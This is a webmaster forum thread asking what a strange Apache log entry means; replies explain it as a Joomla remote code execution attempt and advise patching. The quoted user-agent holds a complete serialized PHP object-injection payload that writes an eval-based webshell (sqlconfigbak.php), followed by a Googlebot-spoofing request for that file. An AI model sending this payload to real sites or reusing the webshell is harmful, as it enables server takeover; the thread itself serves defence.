: Was user-agent identification used for some scripting attack techique? Apache access log entries on my site are typically like this one: 207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact
Apache access log entries on my site are typically like this one:
207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607
so you can see user-agent field there. But today I also found user-agent field used like this:
62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:242:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","|=|x3C".chr(63)."php x24mujj=x24_POST['z'];if(x24mujj!=''){x24xsser=base64_decode(x24_POST['z0']);@eval("x24safedg=x24xsser;");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}~Ů" 0.304 BYPASS 10.10.36.125:104 0.304
Was this an attack? Next log entry appears to have successfully retrieved (code 200) file sqlconfigbak.php mentioned in the script. Although I cannot find the file in file system:
62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244
Please what was happening here?
More posts by @Heady270
3 Comments
Sorted by latest first Latest Oldest Best
Additionally to other answers, note that the fact that this attack apparently worked suggests you are running an old, insecure version of PHP. A fix for the bug that this attack exploits was released in september 2015. Run your update process and make sure it pulls in the most recent version of PHP. And check for other outdated programs that are Internet-facing, too, as it seems your server hasn't been kept up-to-date for at least a year.
This is a Joomla 0 Day Attack. Information found here: blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html
This is not a vulnerability test despite the __test. It is an attack.
Make sure that any Joomla install is as up to date as possible.
Another option is to simply use .htaccess to intercept this exploit by looking for a common string, "__test" would work, and redirect to some other place.
The IP address that you linked does not resolve to a Google hostname therefore it is not Google. The person or bot is scanning your site for vulnerabilities. The first one is attempting to find a Joomla vulnerability.
These events are a regular occurrence on most websites, You should ensure that you are following best practices and harden your website, the process is long and you will need to find and follow a online tutorial.
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2025 All Rights reserved.